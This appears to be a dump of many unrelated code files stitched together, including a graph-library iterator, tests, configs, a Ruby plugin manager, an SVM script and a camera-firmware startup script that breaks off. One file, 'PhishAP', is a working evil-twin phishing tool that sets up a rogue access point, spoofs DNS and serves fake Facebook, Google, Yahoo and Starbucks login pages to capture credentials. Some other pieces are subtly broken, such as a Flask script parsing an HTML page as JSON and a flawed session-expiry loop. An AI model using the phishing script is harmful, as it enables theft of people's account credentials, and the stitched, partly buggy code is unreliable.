* as published by the Free Software Foundation, or (at your option) any
* later version.
*
* or (per the licensee's choosing)
*
* (b) the terms of the Eclipse Public License v1.0 as published by
* the Eclipse Foundation.
*/
package org.jgrapht.traverse;
import java.lang.reflect.*;
import java.util.*;
import org.jgrapht.*;
/**
* A degeneracy ordering iterator.
*
* <p>
* The degeneracy of a graph G is the smallest value d such that every nonempty subgraph of G
* contains a vertex of degree at most d. If a graph has degeneracy d, then it has a degeneracy
* ordering, an ordering such that each vertex has d or fewer neighbors that come later in the
* ordering.
*
* <p>
* The iterator crosses components but does not track them, it only tracks visited vertices.
*
* <p>
* The iterator treats the input graph as undirected even if the graph is directed. Moreover, it
* completely ignores self-loops, meaning that it operates as if self-loops do not contribute to the
* degree of a vertex.
*
* @param <V> the graph vertex type
* @param <E> the graph edge type
*
* @author <NAME>
* @since February, 2017
*/
public class DegeneracyOrderingIterator<V, E>
extends AbstractGraphIterator<V, E>
{
private Set<V>[] buckets;
private Map<V, Integer> degrees;
private int minDegree;
private V cur;
/**
* Constructor
*
* @param graph the graph to be iterated
*/
@SuppressWarnings("unchecked")
public DegeneracyOrderingIterator(Graph<V, E> graph)
{
super(graph);
/*
* Count degrees, but skip self-loops
*/
this.minDegree = Integer.MAX_VALUE;
int maxDegree = 0;
this.degrees = new HashMap<>();
for (V v : graph.vertexSet()) {
int d = 0;
for (E e : graph.edgesOf(v)) {
V u = Graphs.getOppositeVertex(graph, e, v);
if (!v.equals(u)) {
d++;
}
}
degrees.put(v, d);
minDegree = Math.min(minDegree, d);
maxDegree = Math.max(maxDegree, d);
}
minDegree = Math.min(minDegree, maxDegree);
/*
* Create buckets
*/
this.buckets = (Set<V>[]) Array.newInstance(Set.class, maxDegree + 1);
for (int i = 0; i < buckets.length; i++) {
buckets[i] = new HashSet<>();
}
for (V v : graph.vertexSet()) {
buckets[degrees.get(v)].add(v);
}
}
/**
* {@inheritDoc}
*
* Always returns true since the iterator does not care about components.
*/
@Override
public boolean isCrossComponentTraversal()
{
return true;
}
/**
* {@inheritDoc}
*
* Trying to disable the cross components nature of this iterator will result into throwing a
* {@link IllegalArgumentException}.
*/
@Override
public void setCrossComponentTraversal(boolean crossComponentTraversal)
{
if (!crossComponentTraversal) {
throw new IllegalArgumentException("Iterator is always cross-component");
}
}
@Override
public boolean hasNext()
{
if (cur != null) {
return true;
}
cur = advance();
if (cur != null && nListeners != 0) {
fireVertexTraversed(createVertexTraversalEvent(cur));
}
return cur != null;
}
@Override
public V next()
{
if (!hasNext()) {
throw new NoSuchElementException();
}
V result = cur;
cur = null;
if (nListeners != 0) {
fireVertexFinished(createVertexTraversalEvent(result));
}
return result;
}
private V advance()
{
while (minDegree < buckets.length && buckets[minDegree].isEmpty()) {
minDegree++;
}
V result = null;
if (minDegree < buckets.length) {
Set<V> b = buckets[minDegree];
V v = b.iterator().next();
b.remove(v);
degrees.remove(v);
for (E e : graph.edgesOf(v)) {
V u = Graphs.getOppositeVertex(graph, e, v);
if (v.equals(u)) {
// ignore self-loop
continue;
}
if (degrees.containsKey(u)) {
int uDegree = degrees.get(u);
if (uDegree > minDegree) {
buckets[uDegree].remove(u);
uDegree--;
degrees.put(u, uDegree);
buckets[uDegree].add(u);
}
}
}
result = v;
}
return result;
}
}
|
#!/bin/bash
set -eux
image_name=kiyoad/wb_centos6
id=$(date '+%Y%m%d')
script -ac "docker build -t ${image_name} -f Dockerfile.centos6 ." docker_build_centos6_${id}.log
|
<filename>packages/app/src/components/VisualizationOptions/__tests__/CheckboxBaseOption.spec.js
import React from 'react'
import { shallow } from 'enzyme'
import { Checkbox } from '@dhis2/ui'
import { CheckboxBaseOption } from '../Options/CheckboxBaseOption'
describe('DV > Options > CheckboxBaseOption', () => {
let props
let shallowCheckboxBaseOption
let onChange
const checkboxBaseOption = props => {
shallowCheckboxBaseOption = shallow(<CheckboxBaseOption {...props} />)
return shallowCheckboxBaseOption
}
beforeEach(() => {
onChange = jest.fn()
props = {
value: false,
label: 'text',
option: { name: 'checkbox1' },
onChange,
}
shallowCheckboxBaseOption = undefined
})
it('renders a label for checkbox', () => {
expect(checkboxBaseOption(props).find(Checkbox).props().label).toEqual(
props.label
)
})
it('renders the checkbox with the correct checked state', () => {
expect(checkboxBaseOption(props).find(Checkbox).props().checked).toBe(
props.value
)
})
it('should trigger the onChange callback on checkbox change', () => {
const checkbox = checkboxBaseOption(props).find(Checkbox)
checkbox.simulate('change', { checked: true })
expect(onChange).toHaveBeenCalled()
})
})
|
const crypto = require('crypto');
let sessions = [];
const FILES_REMOVE_EXPIRED_SESSIONS_FREQ_MILLI = process.env.FILES_REMOVE_EXPIRED_SESSIONS_FREQ_MINS * 60 * 1000;
setInterval(removeExpiredSessions, FILES_REMOVE_EXPIRED_SESSIONS_FREQ_MILLI);
const ROLE = {
ADMIN: 'admin',
USER: 'user',
INVITEE: 'invitee'
}
// admin can do anything, so calling authInspector() implies only admin can do the action
function authInspector(...permittedRoles) {
return function (req, res, next) {
let session = isSessionValid(req.get('Authorization'), permittedRoles);
if (!session) {
res.set('WWW-Authenticate', 'xBasic realm="files"');
return res.sendStatus(401);
}
req.headers['Role'] = session.role;
req.headers['Username'] = session.username;
if (session.role === ROLE.INVITEE) {
req.headers['MaxUploadSize'] = session.invite.maxUploadSize;
req.headers['ExpirationDate'] = session.invite.expirationDate;
}
next();
}
}
/** Returns the authorization string */
function createNewSession(username, role, invite=undefined) {
let newSession = {
username: username,
role: role,
creationDate: new Date(),
authorization: crypto.randomBytes(16).toString('hex'),
invite: invite
}
sessions.push(newSession);
return newSession.authorization;
}
const FILES_SESSION_VALIDITY_DURATION_MILLI = process.env.FILES_SESSION_VALIDITY_DURATION_MINS * 60 * 1000;
// Returns session if session valid. False if session invalid
function isSessionValid(authorization, permittedRoles) {
if (!authorization) return false
let currentDate = new Date();
for (let i = sessions.length-1; i >= 0; i--) { // Count down for efficiency since new sessions are appended to sessions array
if ((currentDate - sessions[i].creationDate) <= FILES_SESSION_VALIDITY_DURATION_MILLI) {
if(sessions[i].authorization === authorization) {
if (sessions[i].role === ROLE.ADMIN) {
return sessions[i];
} else {
for (const permittedRole of permittedRoles) {
if (sessions[i].role === permittedRole) {
return sessions[i];
}
}
return false;
}
}
} else {
if(sessions[i].authorization === authorization) {
sessions.splice(i, 1); // removes 1 element starting at index i
return false;
}
}
}
return false;
}
function removeExpiredSessions() {
let currentDate = new Date();
for (let i = 0; i < sessions.length; i++) {
if ((currentDate - sessions[i].creationDate) > 4000) {
sessions.splice(i, 1); // removes 1 element starting at index i
}
}
}
module.exports = { authInspector, createNewSession, ROLE } |
#!/usr/bin/env bash
#--------------------------------
# NO PASSWORD IS DISPLAYED!!!!
# FOR EDUCATIONAL PURPOSES ONLY!
#--------------------------------
CLEAN="\033[0m"
RED='\033[01;31m'
YELLOW='\033[01;33m'
WHITE='\033[01;37m'
GREEN='\033[01;32m'
BOLD='\033[1m'
if [ "$EUID" -ne 0 ]
then printf "${RED}[-]${CLEAN} Please, run as root\n"
exit
fi
if ! hash airbase-ng 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install airbase-ng\n"; exit 3
fi
if ! hash dnsmasq 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install dnsmasq\n"; exit 3
fi
if ! hash xterm 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install xterm\n"; exit 3
fi
if ! hash python3 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install python3\n"; exit 3
fi
#Create dnsmasq config file
makeconf() {
printf "interface=at0\n" >> conf/dnsmasq.conf
printf "dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h\n" >> conf/dnsmasq.conf
printf "dhcp-option=3,10.0.0.1\n" >> conf/dnsmasq.conf
printf "dhcp-option=6,10.0.0.1\n" >> conf/dnsmasq.conf
printf "server=8.8.8.8\n" >> conf/dnsmasq.conf
printf "log-queries\n" >> conf/dnsmasq.conf
printf "log-dhcp\n" >> conf/dnsmasq.conf
printf "address=/#/10.0.0.1\n" >> conf/dnsmasq.conf
}
FILE=conf/dnsmasq.conf
if [ ! -f "$FILE" ]; then
makeconf
fi
monitor() {
printf "\n${YELLOW}[*]${CLEAN} Starting monitor mode...\n"
ifconfig $iface down > /dev/null 2>&1
iwconfig $iface mode monitor > /dev/null 2>&1
ifconfig $iface up > /dev/null 2>&1
sleep 2
printf "${GREEN}[+]${CLEAN} Monitor mode... ${GREEN}OK${CLEAN}\n\n"
}
config() {
ifconfig at0 up #up interface
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #set gateway
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #create the route
iptables -P FORWARD ACCEPT #enable forward
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 #redirect http req to gateway
echo "1" > /proc/sys/net/ipv4/ip_forward #enable forward
}
fake_ap() {
echo -e "${YELLOW}[*]${CLEAN} Creating Fake-Ap network..."
xterm -geometry "95x15-0+0" -bg black -fg green -title "FAKE-AP - PhishAP" -e zsh -c "airbase-ng $iface -e "$essid"" > /dev/null 2>&1 &
echo -e "${GREEN}[+]${CLEAN} Fake AP... ${GREEN}OK${CLEAN}\n"
sleep 3
config
printf "${YELLOW}[*]${CLEAN} Starting DNSMasq...\n"
sleep 3
pkill dnsmasq
xterm -geometry "95x19-0+230" -bg black -fg yellow -title "DNSMASQ - PhishAP" -e zsh -c "dnsmasq -C conf/dnsmasq.conf -d" > /dev/null 2>&1 &
xterm -geometry "95x15-0+550" -bg black -fg red -title "DNSSPOOF - PhishAP" -e zsh -c "dnsspoof -i at0" > /dev/null 2>&1 &
echo -e "${GREEN}[+]${CLEAN} DNSMasq... ${GREEN}OK${CLEAN}\n"
}
http_server() {
printf "${YELLOW}[?]${CLEAN} - Choose your fake page\n\n"
printf "${YELLOW}[*]${CLEAN} 1 - Facebook Login\n"
printf "${YELLOW}[*]${CLEAN} 2 - Google Login\n"
printf "${YELLOW}[*]${CLEAN} 3 - Yahoo Login\n"
printf "${YELLOW}[*]${CLEAN} 4 - Starbucks Login\n\n"
prompt="Pick an option:"
options=("1" "2" "3" "4") > /dev/null 2>&1 &
PS3="$prompt "
select opt in "${options[@]}" "Quit"; do
case "$REPLY" in
1) python3 -m http.server 80 -d templates/facebook-login/;;
2) python3 -m http.server 80 -d templates/google-login/;;
3) python3 -m http.server 80 -d templates/yahoo-login/;;
4) python3 -m http.server 80 -d templates/starbucks-login/;;
$((${#options[@]}+1))) echo "${GREEN}[!]${CLEAN} Goodbye!"; break;;
*) printf "${RED}[-]${CLEAN} Invalid option. Try another one.";continue;;
esac
done
}
banner() {
clear
echo -e "${BOLD} _ _ ___ _______ ___ ${CLEAN}"
echo -e "${BOLD} | | _ | || | | || | ${CLEAN}"
echo -e "${BOLD} | || || || | ____ | ___|| | ${CLEAN}${YELLOW}PhishAP - Fake-AP Creator${CLEAN}"
echo -e "${BOLD} | || | |____| | |___ | | ${CLEAN}${YELLOW}Version 1.0${CLEAN}"
echo -e "${BOLD} | || | | ___|| | ${CLEAN}${YELLOW}xpsecsecurity.com${CLEAN}"
echo -e "${BOLD} | _ || | | | | | ${CLEAN}"
echo -e "${BOLD} |__| |__||___| |___| |___| ${CLEAN}"
printf "\n\n"
}
main() {
airmon-ng
printf "${YELLOW}[*]${CLEAN} Set your Wi-Fi interface: "
read iface
printf "${YELLOW}[*]${CLEAN} Fake-AP name: "
read essid
banner
monitor
fake_ap
http_server
}
banner
main
|
<reponame>uwap/BahnhofsAbfahrten
// @flow
import { Actions } from 'client/actions/config';
import { type ActionType, handleActions } from 'redux-actions';
import { defaultConfig, setCookieOptions } from 'client/util';
import Cookies from 'universal-cookie';
export type State = {|
cookies: Cookies,
open: boolean,
config: marudorConfig,
online: boolean,
|};
const defaultState: State = {
cookies: new Cookies(),
open: false,
config: defaultConfig,
online: true,
};
export default handleActions<State, *>(
{
[String(Actions.setOnline)]: (state: State, { payload }: ActionType<typeof Actions.setOnline>) => ({
...state,
online: payload,
}),
[String(Actions.setCookies)]: (state: State, { payload }: ActionType<typeof Actions.setCookies>) => ({
open: false,
config: {
...defaultConfig,
...payload.get('config'),
},
cookies: payload,
}),
[String(Actions.setMenu)]: (state: State, { payload }: ActionType<typeof Actions.setMenu>) => ({
...state,
open: payload,
}),
[String(Actions.setConfig)]: (state: State, { payload: { key, value } }: ActionType<typeof Actions.setConfig>) => {
const newState = {
...state,
config: {
...state.config,
[key]: value,
},
};
state.cookies.set('config', newState.config, setCookieOptions);
return newState;
},
},
defaultState
);
|
const toBin = (num) => {
return num.toString(2);
}
console.log(toBin(10)); // 1010 |
<filename>src/config/mail.js
/**
* @author: <NAME> <<EMAIL>>
* @description: Configuration for App Email tests with mailtrap.io
*/
export default {
host: 'smtp.mailtrap.io',
port: 2525,
secure: false,
auth: {
user: 'cfffd6667b5174',
pass: '<PASSWORD>'
},
default: {
from: 'FastFeet Notification <<EMAIL>>'
}
};
|
package org.jeecg.modules.device.service;
import com.ciat.bim.server.dao.ToData;
import com.github.jeffreyning.mybatisplus.service.IMppService;
import org.apache.poi.ss.formula.functions.T;
import org.jeecg.modules.device.entity.TsKvLatest;
import com.baomidou.mybatisplus.extension.service.IService;
import java.util.List;
/**
* @Description: 最新遥测数据
* @Author: jeecg-boot
* @Date: 2022-02-16
* @Version: V1.0
*/
public interface ITsKvLatestService extends IMppService<TsKvLatest> {
List<String> findAllKeysByEntityIds(List<String> collect);
List<String> getKeysByTenantId(String id);
List<String> getKeysByDeviceProfileId(String id, String id1);
List<TsKvLatest> findAllByEntityId(String id);
}
|
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package binarytree;
/**
*
* @author jeff
*/
public class BinaryTree {
Nodo root;
//inserta un nodo
public void add(int valor){
root = addRecursivo(root, valor);
}
//método recursivo
private Nodo addRecursivo(Nodo actual, int valor){
if(actual == null){
return new Nodo(valor);
}
if(valor < actual.valor){
actual.izquierda = addRecursivo(actual.izquierda, valor);
}
else if(valor > actual.valor){
actual.derecha = addRecursivo(actual.derecha, valor);
}else{
return actual;
}
return actual;
}
//imprime nodo
public void preOrden(Nodo nodo){
if(nodo != null){
System.out.print(" " + nodo.valor);
preOrden(nodo.izquierda);
preOrden(nodo.derecha);
}
}
public void postOrden(Nodo nodo){
if(nodo != null){
postOrden(nodo.izquierda);
postOrden(nodo.derecha);
System.out.print(" " + nodo.valor);
}
}
public void inOrden(Nodo nodo){
if(nodo != null){
inOrden(nodo.izquierda);
System.out.print(" " + nodo.valor);
inOrden(nodo.derecha);
}
}
//eliminar nodo
public void delete(int valor){
deleteRecursivo(root, valor);
}
private Nodo deleteRecursivo(Nodo actual, int valor){
if(actual == null)
return null;
if(valor == actual.valor){
//si el nodo es una terminación u hoja
if(actual.izquierda == null && actual.derecha == null){
return null;
}
//si el nodo tiene un hijo
if(actual.derecha == null)
return actual.izquierda;
if(actual.izquierda == null)
return actual.derecha;
//si el nodo tiene dos hijos
int valorMasPequeno = encuentraValorMasPequeno(actual.derecha);
actual.valor = valorMasPequeno;
actual.derecha = deleteRecursivo(actual.derecha, valorMasPequeno);
return actual;
}
if(valor < actual.valor){
actual.izquierda = deleteRecursivo(actual.izquierda, valor);
return actual;
}
actual.derecha = deleteRecursivo(actual.derecha, valor);
return actual;
}
//encuentra el nodo con el valor más pequeño
private int encuentraValorMasPequeno(Nodo root){
return root.izquierda == null ? root.valor : encuentraValorMasPequeno(root.izquierda);
}
//encuentra nodo
public boolean contieneNodoRecursivo(Nodo actual, int valor){
if(actual == null)
return false;
if(valor == actual.valor){
return true;
}
if(valor < actual.valor){
return contieneNodoRecursivo(actual.izquierda, valor);
}
else
return contieneNodoRecursivo(actual.derecha, valor);
}
}
|
<filename>tests/shared/src/main/scala/caseapp/demo/ManualCommandNotAdtOptions.scala
package caseapp.demo
import caseapp.{ArgsName, ProgName}
object ManualCommandNotAdtOptions {
@ProgName("c1")
@ArgsName("c1-stuff")
final case class Command1Opts(s: String)
@ProgName("c2")
final case class Command2Opts(b: Boolean)
@ProgName("c3")
final case class Command3Opts(n: Int = 2)
}
|
<gh_stars>0
const { Agent, api, db, util } = require('../lib')
describe('db-noauth', function () {
let agent
before(function () {
agent = new Agent()
// Change the organization name to trigger unknown organization errors.
agent.orgName = util.randomString()
})
it('fails exists with bad parameter value', async function () {
await db.exists(agent, { query: {} }).fails()
})
it('fails exists with bad parameter type', async function () {
await db.exists(agent, { query: { exists: 5 } }).fails()
})
it('fails exists with unknown database', async function () {
await db.exists(agent).notFound()
})
describe('fails create with missing label', function () {
const parts = [
'{}',
'{"comment":"We test a non-empty comment string here."}',
]
for (const bodyString of parts) {
it(bodyString, async function () {
await db.create(agent, { bodyString }).fails(api.error.missingParameter('label'))
})
}
})
it('fails create with invalid JSON', async function () {
const bodyString = "{X{'''"
await db
.create(agent, { bodyString })
.unverified()
.then(api.response.verify(api.response.invalidJSON(bodyString)))
})
it('fails create with duplicate field (#603)', async function () {
const bodyString = '{"comment":"c","comment":"c","label":"l"}'
await db
.create(agent, { bodyString })
.unverified()
.then(api.response.verify(api.response.duplicateField))
})
it('fails create with unknown organization', async function () {
await db.create(agent).notFound(api.error.unknownOrganization(agent.orgName))
})
it('fails delete with unknown organization', async function () {
await db.delete(agent).notFound(api.error.unknownOrganization(agent.orgName))
})
})
|
import requests
# api-endpoint
URL = "http://www.marketwatch.com/investing/stock/AAPL"
# sending get request and saving the response as response object
r = requests.get(url = URL)
# extracting data in json format
data = r.json()
# extracting stock quote
stock_quote = data['price']
# creating the web service
from flask import Flask
app = Flask(__name__)
@app.route("/")
def index():
return stock_quote
if __name__ == "__main__":
app.run(debug=True) |
# frozen_string_literal: true
module Bridgetown
class PluginManager
attr_reader :site
# Create an instance of this class.
#
# site - the instance of Bridgetown::Site we're concerned with
#
# Returns nothing
def initialize(site)
@site = site
end
# Require all the plugins which are allowed.
#
# Returns nothing
def conscientious_require
require_plugin_files
end
def self.require_from_bundler
if !ENV["BRIDGETOWN_NO_BUNDLER_REQUIRE"] && File.file?("Gemfile")
require "bundler"
Bundler.setup
required_gems = Bundler.require(:bridgetown_plugins)
install_yarn_dependencies(required_gems)
message = "Required #{required_gems.map(&:name).join(", ")}"
Bridgetown.logger.debug("PluginManager:", message)
ENV["BRIDGETOWN_NO_BUNDLER_REQUIRE"] = "true"
true
else
false
end
end
# Iterates through loaded plugins and finds yard-add gemspec metadata.
# If that exact package hasn't been installed, execute yarn add
#
# Returns nothing.
def self.install_yarn_dependencies(required_gems)
return unless File.exist?("package.json")
package_json = JSON.parse(File.read("package.json"))
required_gems.each do |loaded_gem|
next unless loaded_gem.to_spec&.metadata&.dig("yarn-add")
yarn_add_dependency = loaded_gem.to_spec.metadata["yarn-add"].split("@")
next unless yarn_add_dependency.length == 2
# check matching version number is see if it's already installed
current_package = package_json["dependencies"].dig(yarn_add_dependency.first)
next unless current_package.nil? || current_package != yarn_add_dependency.last
# all right, time to install the package
cmd = "yarn add #{yarn_add_dependency.join("@")}"
system cmd
end
end
# Require all .rb files
#
# Returns nothing.
def require_plugin_files
plugins_path.each do |plugin_search_path|
plugin_files = Utils.safe_glob(plugin_search_path, File.join("**", "*.rb"))
Bridgetown::External.require_with_graceful_fail(plugin_files)
end
end
# Public: Setup the plugin search path
#
# Returns an Array of plugin search paths
def plugins_path
if site.config["plugins_dir"].eql? Bridgetown::Configuration::DEFAULTS["plugins_dir"]
[site.in_root_dir(site.config["plugins_dir"])]
else
Array(site.config["plugins_dir"]).map { |d| File.expand_path(d) }
end
end
end
end
|
import {Exception} from "./Exception";
export class InvalidTokenException extends Exception {
constructor(code: string = null, message: string = null, data: any = null) {
super();
if (!code) {
this.code = 'INVALID';
} else {
this.code = code;
}
if (!message) {
this.message = 'Provided token is not valid';
} else {
this.message = message;
}
this.data = data;
}
}
|
import scipy.io as sio
import numpy as np
import scipy
import matplotlib.pyplot as plt
import matplotlib as mpl
from svm import *
from svmutil import *
def get_hyper_param(y, x):
'''
Get the best hyperparameters, C and gamma.
Args:
y: label
x: data
Returns:
C, gamma
'''
bestcv = 0
for log2c in range(-1, 4):
for log2g in range(-4, 1):
cmd = f'-v 5 -c {2**log2c} -g {2**log2g} -m 300'
cv = svm_train(y, x, cmd)
if cv >= bestcv:
bestcv = cv
bestc = 2 ** log2c
bestg = 2 ** log2g
return bestc, bestg
def get_index(model):
'''
Obtain index of the max 3 and min 3 lagrange multipliers.
Args:
model: svm_model
Returns:
list[min1, min2, min3, max1, max2, max3]
'''
coef = np.array(model.get_sv_coef()).ravel()
idx_min = np.argsort(coef)[:3]
idx_max = np.argsort(-coef)[:3]
idx = np.concatenate((idx_min, idx_max)).ravel().tolist()
model_idx = model.get_sv_indices()
return [model_idx[i] for i in idx]
def fix_hist_step_vertical_line_at_end(ax):
'''
Fix hist step vertical line at end for axes `ax`.
'''
axpolygons = [poly for poly in ax.get_children(
) if isinstance(poly, mpl.patches.Polygon)]
for poly in axpolygons:
poly.set_xy(poly.get_xy()[:-1])
def plot_cdf(y, x, model, c, digit, g=None):
n_bins = 10000
_, _, dec_val = svm_predict(y, x, model)
fig, ax = plt.subplots()
margin = np.multiply(np.array(dec_val).ravel(), y)
plt.hist(margin, n_bins, density=True, histtype='step', cumulative=True)
plt.ylim(top=1)
plt.xlabel('Margin')
plt.ylabel('Cumulative Distribution Function')
if g != None:
plt.title(f'Digit: {digit} (c={c}, g={g})')
else:
plt.title(f'Digit: {digit} (c={c})')
fix_hist_step_vertical_line_at_end(ax)
if g != None:
plt.savefig(f'img/c_{c}_g_{g}_digit_{digit}_cdf.png')
else:
plt.savefig(f'img/c_{c}_digit_{digit}_cdf.png')
plt.close(fig)
|
const assert = require('assert');
const flatstr = require('flatstr');
const hook = require('../../../src/custom/cappasity-info-post');
const file = {
uploadId: 'f1c9d940-35bf-44f7-9134-89bee51d0ee3',
uploadType: 'simple',
c_ver: '4.0.0',
packed: false,
status: '3',
};
describe('cappasity-info-post hook test suite', function suite() {
beforeEach('add stubs', function stubs() {
this.config = {
apiDomain: 'api.cappasity.com',
};
this.boundHook = hook.bind(this);
});
describe('get embedded info', function modelSuite() {
it('should be able to set embed code', function test() {
const embeddedFile = this.boundHook(file);
assert.ok(embeddedFile.embed);
const expectedAttrs = flatstr(`
allowfullscreen
mozallowfullscreen="true"
webkitallowfullscreen="true"
width="{{ width }}"
height="{{ height }}"
frameborder="0"
style="border:0;"
src="https://api.cappasity.com/api/player/f1c9d940-35bf-44f7-9134-89bee51d0ee3/`
+ 'embedded?autorun={{ autorun }}&closebutton={{ closebutton }}&logo={{ logo }}'
+ '&analytics={{ analytics }}&uipadx={{ uipadx }}&uipady={{ uipady }}'
+ '&enablestoreurl={{ enablestoreurl }}&storeurl={{ storeurl }}&hidehints={{ hidehints }}'
+ '&language={{ language }}&autorotate={{ autorotate }}&autorotatetime={{ autorotatetime }}'
+ '&autorotatedelay={{ autorotatedelay }}&autorotatedir={{ autorotatedir }}'
+ '&hidefullscreen={{ hidefullscreen }}&hideautorotateopt={{ hideautorotateopt }}'
+ '&hidesettingsbtn={{ hidesettingsbtn }}"')
.replace(/\s+/g, ' ')
.trim();
assert.equal(embeddedFile.embed.code, `<iframe ${expectedAttrs}></iframe>`);
});
});
});
|
#!/bin/sh
CONF_FILE="etc/system.conf"
YI_HACK_PREFIX="/tmp/sd/yi-hack"
YI_HACK_UPGRADE_PATH="/tmp/sd/.fw_upgrade"
YI_HACK_VER=$(cat /tmp/sd/yi-hack/version)
MODEL_SUFFIX=$(cat /tmp/sd/yi-hack/model_suffix)
get_config()
{
key=$1
grep -w $1 $YI_HACK_PREFIX/$CONF_FILE | cut -d "=" -f2
}
start_buffer()
{
# Trick to start circular buffer filling
./cloud &
IDX=`hexdump -n 16 /dev/shm/fshare_frame_buf | awk 'NR==1{print $8}'`
N=0
while [ "$IDX" -eq "0000" ] && [ $N -lt 60 ]; do
IDX=`hexdump -n 16 /dev/shm/fshare_frame_buf | awk 'NR==1{print $8}'`
N=$(($N+1))
sleep 0.2
done
killall cloud
ipc_cmd -x
}
export PATH=/usr/bin:/usr/sbin:/bin:/sbin:/home/base/tools:/home/app/localbin:/home/base:/tmp/sd/yi-hack/bin:/tmp/sd/yi-hack/sbin:/tmp/sd/yi-hack/usr/bin:/tmp/sd/yi-hack/usr/sbin
export LD_LIBRARY_PATH=/lib:/usr/lib:/home/lib:/home/qigan/lib:/home/app/locallib:/tmp/sd:/tmp/sd/gdb:/tmp/sd/yi-hack/lib
ulimit -s 1024
# Remove core files, if any
rm -f $YI_HACK_PREFIX/bin/core
rm -f $YI_HACK_PREFIX/www/cgi-bin/core
touch /tmp/httpd.conf
if [ -f $YI_HACK_UPGRADE_PATH/yi-hack/fw_upgrade_in_progress ]; then
echo "#!/bin/sh" > /tmp/fw_upgrade_2p.sh
echo "# Complete fw upgrade and restore configuration" >> /tmp/fw_upgrade_2p.sh
echo "sleep 1" >> /tmp/fw_upgrade_2p.sh
echo "cd $YI_HACK_UPGRADE_PATH" >> /tmp/fw_upgrade_2p.sh
echo "cp -rf * .." >> /tmp/fw_upgrade_2p.sh
echo "cd .." >> /tmp/fw_upgrade_2p.sh
echo "rm -rf $YI_HACK_UPGRADE_PATH" >> /tmp/fw_upgrade_2p.sh
echo "rm $YI_HACK_PREFIX/fw_upgrade_in_progress" >> /tmp/fw_upgrade_2p.sh
echo "sync" >> /tmp/fw_upgrade_2p.sh
echo "sync" >> /tmp/fw_upgrade_2p.sh
echo "sync" >> /tmp/fw_upgrade_2p.sh
echo "reboot" >> /tmp/fw_upgrade_2p.sh
sh /tmp/fw_upgrade_2p.sh
exit
fi
$YI_HACK_PREFIX/script/check_conf.sh
hostname -F $YI_HACK_PREFIX/etc/hostname
export TZ=$(get_config TIMEZONE)
if [[ $(get_config SWAP_FILE) == "yes" ]] ; then
SD_PRESENT=$(mount | grep mmc | grep -c ^)
if [[ $SD_PRESENT -eq 1 ]]; then
if [[ -f /tmp/sd/swapfile ]]; then
swapon /tmp/sd/swapfile
else
dd if=/dev/zero of=/tmp/sd/swapfile bs=1M count=64
chmod 0600 /tmp/sd/swapfile
mkswap /tmp/sd/swapfile
swapon /tmp/sd/swapfile
fi
fi
fi
if [[ x$(get_config USERNAME) != "x" ]] ; then
USERNAME=$(get_config USERNAME)
PASSWORD=$(get_config PASSWORD)
ONVIF_USERPWD="--user $USERNAME --password $PASSWORD"
echo "/:$USERNAME:$PASSWORD" > /tmp/httpd.conf
fi
if [[ x$(get_config SSH_PASSWORD) != "x" ]] ; then
SSH_PASSWORD=$(get_config SSH_PASSWORD)
PASSWORD_MD5="$(echo "${SSH_PASSWORD}" | mkpasswd --method=MD5 --stdin)"
cp -f "/etc/passwd" "/tmp/sd/yi-hack/etc/passwd"
sed -i 's|^root::|root:'${PASSWORD_MD5}':|g' "/tmp/sd/yi-hack/etc/passwd"
sed -i 's|/root|/tmp/sd/yi-hack|g' "/tmp/sd/yi-hack/etc/passwd"
mount --bind "/tmp/sd/yi-hack/etc/passwd" "/etc/passwd"
cp -f "/etc/shadow" "/tmp/sd/yi-hack/etc/shadow"
sed -i 's|^root::|root:'${PASSWORD_MD5}':|g' "/tmp/sd/yi-hack/etc/shadow"
mount --bind "/tmp/sd/yi-hack/etc/shadow" "/etc/shadow"
fi
case $(get_config RTSP_PORT) in
''|*[!0-9]*) RTSP_PORT=554 ;;
*) RTSP_PORT=$(get_config RTSP_PORT) ;;
esac
case $(get_config ONVIF_PORT) in
''|*[!0-9]*) ONVIF_PORT=80 ;;
*) ONVIF_PORT=$(get_config ONVIF_PORT) ;;
esac
case $(get_config HTTPD_PORT) in
''|*[!0-9]*) HTTPD_PORT=8080 ;;
*) HTTPD_PORT=$(get_config HTTPD_PORT) ;;
esac
# todo
#if [ ! -f $YI_PREFIX/cloudAPI_real ]; then
# mv $YI_PREFIX/cloudAPI $YI_PREFIX/cloudAPI_real
# cp $YI_HACK_PREFIX/script/cloudAPI $YI_PREFIX/
#fi
if [[ $(get_config DISABLE_CLOUD) == "no" ]] ; then
(
if [ $(get_config RTSP_AUDIO) != "no" ]; then
touch /tmp/audio_fifo.requested
fi
if [ $(get_config SPEAKER_AUDIO) != "no" ]; then
touch /tmp/audio_in_fifo.requested
fi
cd /home/app
LD_LIBRARY_PATH="/tmp/sd/yi-hack/lib:/lib:/usr/lib:/home/lib:/home/qigan/lib:/home/app/locallib:/tmp/sd:/tmp/sd/gdb" ./rmm &
sleep 6
dd if=/tmp/audio_fifo of=/dev/null bs=1 count=8192
# dd if=/dev/zero of=/tmp/audio_in_fifo bs=1 count=1024
./mp4record &
./cloud &
./p2p_tnp &
./oss &
if [ -f ./oss_fast ]; then
./oss_fast &
fi
if [ -f ./oss_lapse ]; then
./oss_lapse &
fi
./rtmp &
./watch_process &
)
else
(
if [ $(get_config RTSP_AUDIO) != "no" ]; then
touch /tmp/audio_fifo.requested
fi
if [ $(get_config SPEAKER_AUDIO) != "no" ]; then
touch /tmp/audio_in_fifo.requested
fi
cd /home/app
LD_LIBRARY_PATH="/tmp/sd/yi-hack/lib:/lib:/usr/lib:/home/lib:/home/qigan/lib:/home/app/locallib:/tmp/sd:/tmp/sd/gdb" ./rmm &
sleep 6
dd if=/tmp/audio_fifo of=/dev/null bs=1 count=8192
# dd if=/dev/zero of=/tmp/audio_in_fifo bs=1 count=1024
# Trick to start circular buffer filling
start_buffer
if [[ $(get_config REC_WITHOUT_CLOUD) == "yes" ]] ; then
./mp4record &
fi
mkdir /tmp/etc
cp -R /etc/* /tmp/etc
mount --bind /tmp/etc /etc
